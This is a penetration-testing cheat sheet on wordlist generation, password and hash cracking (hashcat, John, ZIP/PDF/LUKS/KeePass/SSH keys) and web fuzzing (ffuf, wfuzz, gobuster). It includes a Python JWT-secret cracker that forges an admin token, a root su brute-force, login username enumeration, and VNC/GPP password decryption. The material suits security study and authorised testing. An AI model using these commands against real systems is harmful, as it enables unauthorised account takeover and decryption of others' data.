Cracking / Fuzzing / Brute-force
00. Create Wordlists
00.1 Crunch
## ------------------| Usage
## crunch generates every 8-character word from its default lowercase set, starting at aaaaaaaa and ending at zzzzzzzz
crunch 8 8
## -t takes a pattern; the pattern length must equal both the min and max length (4 here)
crunch 4 4 -t @,%^
### Specifies a pattern, eg: @@god@@@@ (with crunch 9 9) where only the @'s, ,'s, %'s, and ^'s change; other characters stay fixed.
### @ --> lower case characters
### , --> upper case characters
### % --> numbers
### ^ --> symbols
## crunch will display a wordlist using the character set abcdefg that starts at a and ends at gggggg
crunch 1 6 abcdefg
## ------------------| Best Usages
crunch 4 6 0123456789ABCDEF -o crunch1.txt
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
crunch 1 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt
00.2 CeWL
cewl --with-numbers -d 7 -m 5 -w cewl.out http(s)://IP/anything/
# -d : Depth to spider to, default 2.
# -m : Minimum word length, default 3.
# -w : Write the output to the file.
# -c : Show the count for each word found.
# -o : Let the spider visit other sites.
# --with-numbers: Accept words with numbers in as well as just letters
# --header : In format name:value - can pass multiple.
# --lowercase : Lowercase all parsed words
# --auth_user : Authentication username.
# --auth_pass : Authentication password.
# --proxy_host: Proxy host.
# --proxy_port: Proxy port, default 8080.
00.3 UserNameGen
wget https://raw.githubusercontent.com/h4rithd/UserNameGen/master/usernamegen.py
pip install argparse textwrap3 tqdm
python usernamegen.py -o output.txt -u "Harith Dilshan"
python usernamegen.py -o output.txt -f usernames.txt
00.4 Username-Anarchy
## ------------------| Generate quick username list for single user
ruby username-anarchy h4rithd dilshan
## ------------------| List username format plugins
ruby username-anarchy --list-formats
## ------------------| Generate username list from file
ruby username-anarchy --input-file names.txt --select-format first,first.last,f.last,flast > newlist.txt
01. Cracking Basic
01.1 Hashcat Basic
Look up the example hash for your algorithm to pick the mode (-m), e.g.:
hashcat --example-hashes | grep -B1 -A2 "NTLM"
Common flags
-a Attack-mode
--force Ignore warnings
--status Enable automatic update of the status screen
--status-json Enable JSON format for status output
--session Define specific session name
--restore Restore session from --session
--outfile Define outfile for recovered hash
- [ Attack Modes ] -
# | Mode
===+======
0 | Straight
1 | Combination
3 | Brute-force
6 | Hybrid Wordlist + Mask
7 | Hybrid Mask + Wordlist
- [ Built-in charsets ] -
# | Mask Attack
====+======
?l | abcdefghijklmnopqrstuvwxyz
?u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d | 0123456789
?h | 0123456789abcdef
?H | 0123456789ABCDEF
?s | «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a | ?l?u?d?s
?b | 0x00 - 0xff
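The crunch -t symbols in 00.1 and the hashcat mask charsets in this table are the same idea: one alphabet per position, and the keyspace is the product of the alphabet sizes. The Python below is an added example written for this page (not code from crunch or hashcat); it expands either syntax, reports the keyspace and the worst-case time at a given hashrate, so you can see before launching that ?a?a?a?a?a?a?a?a is not a wordlist-sized job. The hashrate figure and the crunch symbol set (assumed to be the same 33 printable characters as hashcat's ?s) are assumptions.

```python
"""Added example (not from the page): expand and size crunch -t patterns and
hashcat masks to see the keyspace before running the real tool."""
import itertools
import string

SYMBOLS = " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~"   # hashcat ?s: space + 32 ASCII punctuation

# crunch -t placeholders; '^' assumed to be the same set as hashcat ?s.
CRUNCH = {"@": string.ascii_lowercase, ",": string.ascii_uppercase,
          "%": string.digits, "^": SYMBOLS}

# hashcat built-in charsets (?b, raw bytes, is left out on purpose).
HASHCAT = {"l": string.ascii_lowercase, "u": string.ascii_uppercase,
           "d": string.digits, "h": "0123456789abcdef",
           "H": "0123456789ABCDEF", "s": SYMBOLS}
HASHCAT["a"] = HASHCAT["l"] + HASHCAT["u"] + HASHCAT["d"] + HASHCAT["s"]


def crunch_positions(pattern):
    """crunch -t pattern -> list of per-position alphabets. Characters that are
    not placeholders are literals and stay fixed (e.g. 'god' in '@@god@@@@')."""
    return [CRUNCH.get(ch, ch) for ch in pattern]


def hashcat_positions(mask):
    """hashcat mask such as '?u?l?l?l?d?d?s' -> per-position alphabets.
    '??' is a literal question mark; other characters are literals."""
    out, i = [], 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            key = mask[i + 1]
            out.append("?" if key == "?" else HASHCAT[key])
            i += 2
        else:
            out.append(mask[i])
            i += 1
    return out


def keyspace(positions):
    """Number of candidates: product of the alphabet sizes."""
    n = 1
    for alphabet in positions:
        n *= len(alphabet)
    return n


def expand(positions, limit=None):
    """Yield candidates in lexicographic order with the rightmost position
    varying fastest, which is how crunch walks them (hashcat reorders by its
    markov statistics). limit caps the output for demonstrations."""
    for i, chars in enumerate(itertools.product(*positions)):
        if limit is not None and i >= limit:
            return
        yield "".join(chars)


def crack_time_seconds(positions, hashes_per_second):
    """Worst-case seconds to exhaust the keyspace at the given rate (assumed figure)."""
    return keyspace(positions) / hashes_per_second


if __name__ == "__main__":
    for label, pos in [("crunch @@god@@@@", crunch_positions("@@god@@@@")),
                       ("hashcat ?l?l?l?l?d?d", hashcat_positions("?l?l?l?l?d?d")),
                       ("hashcat ?a?a?a?a?a?a?a?a", hashcat_positions("?a?a?a?a?a?a?a?a"))]:
        # 1e9 H/s is an assumed rate (roughly a single GPU on a fast hash like NTLM).
        print(f"{label}: {keyspace(pos):,} candidates, "
              f"{crack_time_seconds(pos, 1e9) / 3600:.1f} h at 1 GH/s")
    print(list(expand(hashcat_positions("?d?l"), limit=5)))
```

Mask literals still count as one-character alphabets, so a partly known password (fixed prefix, masked suffix) shrinks the keyspace exactly as the numbers show.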
Cracking
## ------------------| Without rules
hashcat hashfile -m <mode> /usr/share/wordlists/rockyou.txt
## ------------------| With rules
hashcat hashfile -m <mode> /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
hashcat hashfile -m <mode> /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/d3ad0ne.rule
HashCat Rules
hashcat --force passwords.list -r /usr/share/hashcat/rules/best64.rule --stdout > passwords.txt
# /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule
# /usr/share/hashcat/rules/T0XlC-insert_space_and_special_0_F.rule
# /usr/share/hashcat/rules/T0XlC-insert_top_100_passwords_1_G.rule
# /usr/share/hashcat/rules/toggles1.rule
# /usr/share/hashcat/rules/specific.rule
# /usr/share/hashcat/rules/leetspeak.rule
# /usr/share/hashcat/rules/toggles2.rule
# /usr/share/hashcat/rules/toggles3.rule
# /usr/share/hashcat/rules/InsidePro-HashManager.rule
# /usr/share/hashcat/rules/T0XlC-insert_00-99_1950-2050_toprules_0_F.rule
# /usr/share/hashcat/rules/generated.rule
# /usr/share/hashcat/rules/T0XlC.rule
# /usr/share/hashcat/rules/oscommerce.rule
# /usr/share/hashcat/rules/OneRuleToRuleThemAll.rule
# /usr/share/hashcat/rules/T0XlCv1.rule
# /usr/share/hashcat/rules/best64.rule
# /usr/share/hashcat/rules/dive.rule
# /usr/share/hashcat/rules/d3ad0ne.rule
# /usr/share/hashcat/rules/toggles5.rule
# /usr/share/hashcat/rules/combinator.rule
# /usr/share/hashcat/rules/toggles4.rule
# /usr/share/hashcat/rules/Incisive-leetspeak.rule
# /usr/share/hashcat/rules/unix-ninja-leetspeak.rule
# /usr/share/hashcat/rules/generated2.rule
# /usr/share/hashcat/rules/rockyou-30000.rule
## OneRuleToRuleThemAll
wget https://raw.githubusercontent.com/NotSoSecure/password_cracking_rules/master/OneRuleToRuleThemAll.rule
Create Rules and Variants
## ------------------| Create a file with the base word(s) (a wordlist, not hashes)
echo 'PleaseSubscribe!' > words
## ------------------| Create new wordlist (every rule applied to every word)
hashcat --stdout words -r /usr/share/hashcat/rules/best64.rule > pw-list
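To see what a rule file actually does to a word, here is an added example in Python written for this page (not hashcat's or John's code). It interprets the most common functions of hashcat's rule syntax and applies a small rule file the way --stdout -r does: case toggles, append/prepend, substitution, truncation, extraction, insertion. Anything it does not implement raises instead of silently passing the word through, and positions past the end of the word leave it unchanged (an approximation of hashcat's behaviour).

```python
"""Added example (not hashcat code): a small interpreter for a subset of
hashcat rule functions, to preview what `hashcat --stdout -r rules` emits."""

NOARG = set(":lucCtrdf{}[]kKq")   # functions without an argument
ONEARG = set("$^TpDzZ@'")         # one argument (a char or a position)
TWOARG = set("sxOio")             # two arguments


def pos(c):
    """Positional argument: 0-9, then A-Z for 10-35, as hashcat encodes them."""
    return int(c, 36)


def tokenize(rule):
    """Split one rule line into (function, args) pairs. Spaces only separate."""
    toks, i = [], 0
    while i < len(rule):
        ch = rule[i]
        if ch == " ":
            i += 1
        elif ch in NOARG:
            toks.append((ch, "")); i += 1
        elif ch in ONEARG:
            toks.append((ch, rule[i + 1])); i += 2
        elif ch in TWOARG:
            toks.append((ch, rule[i + 1:i + 3])); i += 3
        else:
            raise ValueError(f"unsupported rule function {ch!r} in {rule!r}")
    return toks


def apply_fn(fn, arg, w):
    """Apply a single function to word w and return the new word."""
    if fn == ":": return w
    if fn == "l": return w.lower()
    if fn == "u": return w.upper()
    if fn == "c": return w[:1].upper() + w[1:].lower()   # capitalize
    if fn == "C": return w[:1].lower() + w[1:].upper()   # inverted capitalize
    if fn == "t": return w.swapcase()                    # toggle every char
    if fn == "r": return w[::-1]                         # reverse
    if fn == "d": return w + w                           # duplicate
    if fn == "f": return w + w[::-1]                     # reflect
    if fn == "{": return w[1:] + w[:1]                   # rotate left
    if fn == "}": return w[-1:] + w[:-1]                 # rotate right
    if fn == "[": return w[1:]                           # delete first
    if fn == "]": return w[:-1]                          # delete last
    if fn == "k": return w[1] + w[0] + w[2:] if len(w) > 1 else w
    if fn == "K": return w[:-2] + w[-1] + w[-2] if len(w) > 1 else w
    if fn == "q": return "".join(ch * 2 for ch in w)
    if fn == "$": return w + arg                         # append
    if fn == "^": return arg + w                         # prepend
    if fn == "@": return w.replace(arg, "")              # purge char
    if fn == "s": return w.replace(arg[0], arg[1])       # sXY substitute
    if fn == "z": return w[:1] * pos(arg) + w            # duplicate first N times
    if fn == "Z": return w + w[-1:] * pos(arg)           # duplicate last N times
    if fn == "p": return w * (pos(arg) + 1)              # duplicate word N times
    if fn == "'": return w[:pos(arg)]                    # truncate at N
    n = pos(arg[0])
    if n > len(w):                                       # position past the end
        return w
    if fn == "T": return w[:n] + w[n:n + 1].swapcase() + w[n + 1:]
    if fn == "D": return w[:n] + w[n + 1:]               # delete at N
    if fn == "x": return w[n:n + pos(arg[1])]            # extract M chars from N
    if fn == "O": return w[:n] + w[n + pos(arg[1]):]     # omit M chars from N
    if fn == "i": return w[:n] + arg[1] + w[n:]          # insert X at N
    if fn == "o": return w[:n] + arg[1] + w[n + 1:]      # overwrite at N
    raise ValueError(fn)


def apply_rule(rule, word):
    for fn, arg in tokenize(rule):
        word = apply_fn(fn, arg, word)
    return word


def load_rules(text):
    """Rule files: one rule per line; blank lines and '#' comments are skipped."""
    return [ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")]


def mangle(words, rules):
    """Every rule applied to every word, rules in file order, no de-duplication
    (hashcat --stdout does not de-duplicate either)."""
    return [apply_rule(r, w) for w in words for r in rules]


if __name__ == "__main__":
    demo = load_rules(":\nc $1 $2 $3\nsa@ se3 so0\n] ]\nT0 $!\nx04\n")  # constructed mini rule file
    for out in mangle(["password"], demo):
        print(out)
```

Use it to preview a custom rule before a long run, or to explain a cracked password: if "P@ssw0rd1" came out of rockyou.txt plus best64, one of these functions produced it.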
Cheat Sheets
https://github.com/frizb/Hashcat-Cheatsheet
https://hashcat.net/wiki/doku.php?id=hashcat
01.2 JohnTheRipper Basic
Cracking
john hashfile -w=/usr/share/wordlists/rockyou.txt
John Mutation
sudo vi /etc/john/john.conf   # add your own rules under [List.Rules:Wordlist] (used by --rules) or in a new [List.Rules:Name] section (used by --rules=Name)
john --wordlist=words.txt --rules --stdout > new_wordlist.txt
john --wordlist=words.txt --rules=all --stdout > new_wordlist.txt
01.3 SSH
## use the PRIVATE key (id_rsa), not the .pub; an unencrypted private key has no passphrase to crack
python3 /usr/share/john/ssh2john.py id_rsa > id_rsa.john
john id_rsa.john -w=/usr/share/wordlists/rockyou.txt
01.4 ZIP
## ------------------| For Zip
sudo apt-get install fcrackzip
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip
## or you can use following command with johntheripper
zip2john file.zip > hash
john hash
## ------------------| For 7z
sudo apt-get install libcompress-raw-lzma-perl
/usr/share/john/7z2john.pl backup.7z > backup.john
john backup.john -w=/usr/share/wordlists/rockyou.txt
## or test each candidate directly with 7z (slow: one process per password, only for short lists)
while read -r p; do 7za t -p"$p" backup.7z >/dev/null 2>&1 && echo "password: $p" && break; done < /usr/share/wordlists/rockyou.txt
01.5 PDF
## ------------------| Using pdfcrack
apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
## ------------------| Using qpdf (strips the password once it is known; it does not crack)
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
01.6 JWT
## ------------------| Using hashcat
hashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt
## ------------------| Using jwtcrack
pip install PyJWT tqdm
git clone https://github.com/Sjord/jwtcrack.git && cd jwtcrack
### Crack using jwtcrack
python3 crackjwt.py <JWT_TOKEN> /usr/share/wordlists/rockyou.txt
### Convert a JWT to a format John the Ripper can understand
python3 jwt2john.py <JWT_TOKEN> > jwt_token.txt
## ------------------| Using JohnTheRipper
john jwt_token.txt -w=/usr/share/wordlists/rockyou.txt --format=HMAC-SHA256
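All three JWT tools above do the same thing: recompute HMAC-SHA256 over header.payload with each candidate key and compare with the signature. The Python below is an added example for this page using only the standard library (not code from jwtcrack, hashcat or John). It builds a demo HS256 token with a constructed key and wordlist, recovers the key, and then re-signs the payload with elevated claims, which is the actual impact of a weak secret. The demo key, claims and wordlist are made up here; it refuses tokens whose alg is not HS256, since a dictionary attack on the HMAC key does not apply to RS256/ES256 tokens.

```python
"""Added example (not from the page): dictionary attack on an HS256 JWT secret,
then forging a token with the recovered key. Standard library only."""
import base64
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))   # restore padding


def make_hs256_jwt(header: dict, payload: dict, key: bytes) -> str:
    """header.payload.signature, exactly as a server would issue it."""
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url_encode(sig)}"


def claims(token: str) -> dict:
    return json.loads(b64url_decode(token.split(".")[1]))


def crack_hs256(token: str, candidates):
    """Return the first candidate key whose HMAC matches the signature, or None.
    The signing input is the already-encoded header.payload, never the decoded JSON."""
    h, p, s = token.split(".")
    alg = json.loads(b64url_decode(h)).get("alg")
    if alg != "HS256":
        raise ValueError(f"alg={alg}: not an HMAC token, a secret dictionary attack does not apply")
    signing_input = f"{h}.{p}".encode()
    target = b64url_decode(s)
    for cand in candidates:
        key = cand.rstrip("\r\n").encode()          # wordlist lines keep their newline
        mac = hmac.new(key, signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(mac, target):
            return key.decode()
    return None


def forge_admin(token: str, key: str) -> str:
    """With the key known, any claim can be changed and re-signed."""
    h, p, _ = token.split(".")
    header = json.loads(b64url_decode(h))
    payload = json.loads(b64url_decode(p))
    payload["role"] = "admin"
    return make_hs256_jwt(header, payload, key.encode())


# Constructed demo data (not from the page): a token signed with a weak secret
# that happens to be in the small wordlist.
WORDLIST = ["123456", "password", "letmein", "secret123", "qwerty"]
DEMO_TOKEN = make_hs256_jwt({"alg": "HS256", "typ": "JWT"},
                            {"sub": "1", "role": "user"}, b"secret123")

if __name__ == "__main__":
    key = crack_hs256(DEMO_TOKEN, WORDLIST)
    print("recovered key:", key)
    print("forged claims:", claims(forge_admin(DEMO_TOKEN, key)))
```

For a real run replace WORDLIST with an open file handle on rockyou.txt; the per-candidate cost is one SHA-256 HMAC, which is why hashcat -m 16500 is the right tool once the list is large.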
01.7 VNC
## VNC stores the password DES-encrypted with a fixed, publicly known key (e84ad660c4721ae0), e.g. in ~/.vnc/passwd or the Windows registry, so it is decrypted rather than cracked
echo -n <PassWordHash> | xxd -r -p | openssl enc -des-cbc -nopad -nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
01.8 WiFi
## ------------------| AirCrack-ng
aircrack-ng captured.cap -w /usr/share/wordlists/rockyou.txt
01.9 LUKS
# ------------------| Using Hashcat
### Get the payload offset (in 512-byte sectors); the dd count below is offset + 1
cryptsetup luksDump backup.img | grep Payload
### Carve the LUKS header into a hashfile (offset 4096 here, hence count=4097)
dd if=backup.img of=hash bs=512 count=4097
### Cracking (-m 14600 is LUKS v1; check the Version line of luksDump first)
hashcat -m 14600 hash /usr/share/wordlists/rockyou.txt
# ------------------| Using JohnTheRipper
luks2john.py /dev/sdb1 > sdb1.john
john sdb1.john -w=/usr/share/wordlists/rockyou.txt
# ------------------| How to mount/unmount
### Mount
sudo cryptsetup luksOpen backup.img backup
sudo mount /dev/mapper/backup /mnt/
### Unmount
sudo umount -l /mnt/
sudo cryptsetup luksClose backup
01.10 SUDO
# ------------------| Clone the sucrack programe and build it
git clone https://github.com/hemp3l/sucrack.git
cd sucrack
autoreconf -f -i
./configure
make
make install
cd src
ls -al sucrack
## ------------------| Cracking process
### sucrack brute-forces su locally (needs a shell on the box, every failure lands in the auth log); the wordlist is the last argument
### -a ANSI statistics, -w worker threads, -s statistics interval in seconds, -u target user
./sucrack -a -w 20 -s 10 -u root dict.txt
### same, with the built-in word rewriter enabled (-r; see ./sucrack -h for the rule letters)
./sucrack -a -w 20 -s 10 -u root -r dict.txt
01.11 Microsoft Office
## ------------------| Hashcat
wget https://raw.githubusercontent.com/stricture/hashstack-server-plugin-oclhashcat/master/scrapers/office2hashcat.py
python2 office2hashcat.py file.xls > hash.txt   # also doc, dot, docm, xlm, ppt, ...
## pick -m from the hash prefix: $office$*2007 -> 9400, *2010 -> 9500, *2013 -> 9600; $oldoffice$ (Office 97-2003) -> 9700-9820
hashcat -m <mode> hash.txt /usr/share/wordlists/rockyou.txt
## ------------------| JohnTheRipper
wget https://raw.githubusercontent.com/openwall/john/bleeding-jumbo/run/office2john.py
python3 office2john.py file.xls > john-hash.txt   # also doc, dot, docm, xlm, ppt, ...
john john-hash.txt -w=/usr/share/wordlists/rockyou.txt
01.12 Group Policy Preferences
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
01.13 PFX certificate
/usr/share/john/pfx2john.py file.pfx > file.pfx.john
john file.pfx.john -w=/usr/share/wordlists/rockyou.txt
01.14 KeePass
## ------------------| JohnTheRipper
keepass2john Database.kdbx > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
01.15 Ansible
## ------------------| JohnTheRipper (ansible2john.py ships in john's run/ directory)
https://fossies.org/linux/john/run/ansible2john.py
ansible2john file > hash
## ------------------| hashcat
## the hash line is "file:$ansible$...", so tell hashcat to skip the filename prefix with --username
ansible2john file > hash
hashcat -m 16900 hash /usr/share/wordlists/rockyou.txt --username
## ------------------| Decrypt once the vault password is known (prompts for it; --output - writes to stdout)
ansible-vault decrypt --output - file
03. Fuzzing Basic
## ------------------| Extension list
php,html,txt
php,html,txt,bak,tar,zip
php,html,txt,bak,tar,zip,aspx,asp
php,html,txt,bak,tar,zip,aspx,asp,jsp,js
php,html,txt,bak,tar,zip,aspx,asp,jsp,js,htm,exe
03.1 ffuf
Caution: when you pass form data with -d, set the Content-Type header yourself (-H "Content-Type: application/x-www-form-urlencoded"); without it the server may ignore the body and every username/password attempt looks identical. Alternatively use wfuzz, or feed ffuf a raw request with -request.
## ------------------| General options
-H Header "Name: Value", separated by colon. Multiple -H flags are accepted.
-X HTTP method to use
-b Cookie data "NAME1=VALUE1; NAME2=VALUE2" for copy as curl functionality.
-d POST data
-c Colorize output. (default: false)
-r Follow redirects (default: false)
-u Target URL
-v Verbose output, printing full URL
-e Comma separated list of extensions. (.php,.txt,.html)
-x Proxy URL (SOCKS5 or HTTP). For example: http://127.0.0.1:8080 or socks5://127.0.0.1:8080
-ic Ignore wordlist comments (default: false)
-sni Target TLS SNI, does not support FUZZ keyword
-rate Rate of requests per second (default: 0)
-request File containing the raw http request (Like burp request)
-request-proto Protocol to use along with raw request (default: http)
-timeout HTTP request timeout in seconds. (default: 10)
-ignore-body Do not fetch the response content. (default: false)
-recursion Scan recursively. Only FUZZ keyword is supported, and URL (-u) has to end in it. (default: false)
-recursion-depth Maximum recursion depth. (default: 0)
-recursion-strategy Recursion strategy: "default" for a redirect based, and "greedy" to recurse on all matches (default: default)
-replay-proxy Replay matched requests using this proxy.
## ------------------| Filter options
-fc Filter HTTP status codes from response. Comma separated list of codes and ranges
-fl Filter by amount of lines in response. Comma separated list of line counts and ranges
-fr Filter regexp
-fs Filter HTTP response size. Comma separated list of sizes and ranges
-ft Filter by number of milliseconds to the first response byte, either greater or less than. EG: >100 or <100
-fw Filter by amount of words in response. Comma separated list of word counts and ranges
## ------------------| Matcher options
-mc Match HTTP status codes, or "all" for everything. (default: 200,204,301,302,307,401,403,405)
-ml Match amount of lines in response
-mr Match regexp
-ms Match HTTP response size
-mt Match how many milliseconds to the first response byte, either greater or less than. EG: >100 or <100
-mw Match amount of words in response
Best Usage
## ------------------| Directory Fuzz
ffuf -c -ic -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u https://example.org/FUZZ | tee ffuf.out
## ------------------| With Extensions
ffuf -c -ic -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u https://example.org/FUZZ -e .php,.txt,.html | tee ffuf.out
## ------------------| Fuzz with numbers
ffuf -c -ic -w <(seq 0 2000) -u https://example.org/FUZZ | tee ffuf.out
## ------------------| Subdomain Fuzz
ffuf -w hosts.txt -u https://example.org/ -H "Host: FUZZ" -mc 200
Fuzz with POST data
## ------------------| application/json
ffuf -w entries.txt -u https://example.org/ -X POST -H "Content-Type: application/json" -d '{"name": "FUZZ", "anotherkey": "anothervalue"}' -fr "error"
## ------------------| application/x-www-form-urlencoded
ffuf -w entries.txt -u https://example.org/ -X POST -H "Content-Type: application/x-www-form-urlencoded" -d 'name=admin&password=FUZZ' -fr "error"
## ------------------| From burp file
ffuf -w entries.txt -request-proto http -request getUsers.req -fr "error"
03.2 wfuzz
## ------------------| General Options
-u url : Specify a URL for the request.
-w wordlist : Specify a wordlist file (alias for -z file,wordlist).
-V alltype : All parameters bruteforcing (allvars and allpost). No need for FUZZ keyword.
-X method : Specify an HTTP method for the request, ie. HEAD or FUZZ
-e <type> : List of available encoders/payloads/iterators/printers/scripts
-c : Output with colors
-v : Verbose information.
-b cookie : Specify a cookie for the requests. Repeat option for various cookies.
-d postdata : Use post data (ex: "id=FUZZ&catalogue=1")
-H header : Use header (ex:"Cookie:id=1312321&user=FUZZ"). Repeat option for various headers.
--basic/ntlm/digest auth : in format "user:pass" or "FUZZ:FUZZ" or "domain\FUZ2Z:FUZZ"
-f filename,printer : Store results in the output file using the specified printer (raw printer if omitted).
-o printer : Show results using the specified printer.
-t N : Specify the number of concurrent connections (10 default)
-s N : Specify time delay between requests (0 default)
-R depth : Recursive path discovery being depth the maximum recursion level.
-D depth : Maximum link depth level.
-L,--follow : Follow HTTP redirections
-Z : Scan mode (Connection errors will be ignored).
--req-delay N : Sets the maximum time in seconds the request is allowed to take (CURLOPT_TIMEOUT). Default 90.
--conn-delay N : Sets the maximum time in seconds the connection phase to the server to take (CURLOPT_CONNECTTIMEOUT). Default 90.
## ------------------| Scripts
-A, --AA, --AAA : Alias for -v -c and --script=default,verbose,discover respectively
--no-cache : Disable plugins cache. Every request will be scanned.
--script= : Equivalent to --script=default
--script=<plugins> : Runs script's scan. <plugins> is a comma separated list of plugin-files or plugin-categories
--script-help=<plugins> : Show help about scripts.
--script-args n1=v1,... : Provide arguments to scripts. ie. --script-args grep.regex="<A href=\"(.*?)\">"
## ------------------| Payloads
-m iterator : Specify an iterator for combining payloads (product by default)
-z payload : Specify a payload for each FUZZ keyword used in the form of name[,parameter][,encoder].
A list of encoders can be used, ie. md5-sha1. Encoders can be chained, ie. md5@sha1.
Encoders category can be used. ie. url
Use help as a payload to show payload plugin's details (you can filter using --slice)
--zP <params> : Arguments for the specified payload (it must be preceded by -z or -w).
--zD <default> : Default parameter for the specified payload (it must be preceded by -z or -w).
--zE <encoder> : Encoder for the specified payload (it must be preceded by -z or -w).
--slice <filter> : Filter payload's elements using the specified expression. It must be preceded by -z.
## ------------------| Filter options
--filter-help : Filter language specification
--hc/hl/hw/hh N[,N]+ : Hide responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
--sc/sl/sw/sh N[,N]+ : Show responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
--ss/hs regex : Show/hide responses with the specified regex within the content
--filter <filter> : Show/hide responses using the specified filter expression (Use BBB for taking values from baseline)
--prefilter <filter> : Filter items before fuzzing using the specified expression. Repeat for concatenating filters.
Find valid usernames | POST data
wfuzz -c -w /usr/share/seclists/Usernames/Names/names.txt -d "username=FUZZ&password=test123" --hs "No account found with that username" http://10.10.10.97/login.php | tee usernames.txt
Other commands
## ------------------| Range script
wfuzz -c -z range,1-65535 http://127.0.0.1:FUZZ
## ------------------| With encoders
### List available encoders
wfuzz -e encoders
### Apply an encoder to the wordlist payload (urlencode, uri_hex, double_urlencode, ...)
wfuzz -c -z file,/wordlist.txt,urlencode http://example.org/FUZZ
03.3 Gobuster
## ------------------| General Options
-z, --no-progress Don't display progress
-o, --output string Output file to write results to (defaults to stdout)
-q, --quiet Don't print the banner and other noise
-t, --threads int Number of concurrent threads (default 10)
--delay duration Time each thread waits between requests (e.g. 1500ms)
-v, --verbose Verbose output (errors)
-w, --wordlist string Path to the wordlist
-f, --add-slash Append / to each request
-c, --cookies string Cookies to use for the requests
-e, --expanded Expanded mode, print full URLs
-x, --extensions string File extension(s) to search for
-r, --follow-redirect Follow redirects
-H, --headers stringArray Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2'
-k, --no-tls-validation Skip TLS certificate verification
-n, --no-status Don't print status codes
-p, --password string Password for Basic Auth
-P, --proxy string Proxy to use for requests [http(s)://host:port][socks5://127.0.0.1:1080]
-s, --status-codes string Positive status codes (will be overwritten with status-codes-blacklist if set) (default "200,204,301,302,307,401,403")
-b, --status-codes-blacklist string Negative status codes (will override status-codes if set)
--timeout duration HTTP Timeout (default 10s)
-u, --url string The target URL
-a, --useragent string Set the User-Agent string (default "gobuster/3.1.0")
-U, --username string Username for Basic Auth
-d, --discover-backup Upon finding a file search for backup files
--wildcard Force continued operation when wildcard found
Best Usage
gobuster dir -e -f -t 20 -k -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,html,txt -o gobuster.out -u https://mysite.com/
DNS mode
gobuster dns -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -o gobuster-dns.out -d google.com
VHOST Mode
gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -o gobuster-vhost.out -u https://mysite.com
Search backup files
gobuster dir -e -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -d -o gobuster-backups.out -u https://mysite.com/
Fuzzing Mode
gobuster fuzz -u https://example.com?FUZZ=test -w parameter-names.txt
03.4 DirSearch
## ------------------| General Options
-u Target URL
-e Extension list separated by commas (Example: php,asp)
-X Exclude extension list separated by commas (Example: asp,jsp)
-f Add extensions to every wordlist entry. By default dirsearch only replaces the %EXT% keyword with extensions
-t Number of threads
-r Brute-force recursively
-i Include status codes, separated by commas, support ranges (Example: 200,300-399)
-x Exclude status codes, separated by commas, support ranges (Example: 301,500-599)
-q Quiet mode
-m HTTP method (default: GET)
-d HTTP request data
-H HTTP request header, support multiple flags (Example: -H 'Referer: example.com')
-F Follow HTTP redirects
-s Delay between requests
-o Output file
--format Report format (Available: simple, plain, json, xml, md, csv, html)
--proxy Proxy URL, support HTTP and SOCKS proxies (Example: localhost:8080, socks5://localhost:8088)
--timeout Connection timeout
--cookie Choose a cookie for each request
--user-agent Choose a User-Agent for each request
--random-agent Choose a random User-Agent for each request
--full-url Full URLs in the output (enabled automatically in quiet mode)
--no-color No colored output
--exclude-sizes Exclude responses by sizes, separated by commas (Example: 123B,4KB)
--exclude-texts Exclude responses by texts, separated by commas (Example: 'Not found', 'Error')
-U Uppercase wordlist
-L Lowercase wordlist
-C Capital wordlist
--raw=FILE Load raw HTTP request from file (use `--scheme` flag to set the scheme)
Best Usage
dirsearch -r -f -o `pwd`/dirsearch.out --format=plain -x 404 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -e php,html,txt -u http://example.org/
When using HTB
url=http://nineveh.htb/department
dirsearch -f -o `pwd`/$(echo $url | cut -d '/' -f 3).out --format=plain -x 404 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -u $url -e php
03.5 feroxbuster
## ------------------| General Options
-u The target URL
-a Sets the User-Agent (default: feroxbuster/2.7.0)
-A Use a random User-Agent
-f Append / to each request's URL
-H Specify HTTP headers to be used in each request (ex: -H Header:val -H 'stuff: things')
-m Which HTTP request method(s) should be sent (default: GET)
-Q Request's URL query parameters (ex: -Q token=stuff -Q secret=key)
-x File extension(s) to search for (ex: -x php -x pdf js)
-k Disables TLS certificate validation in the client
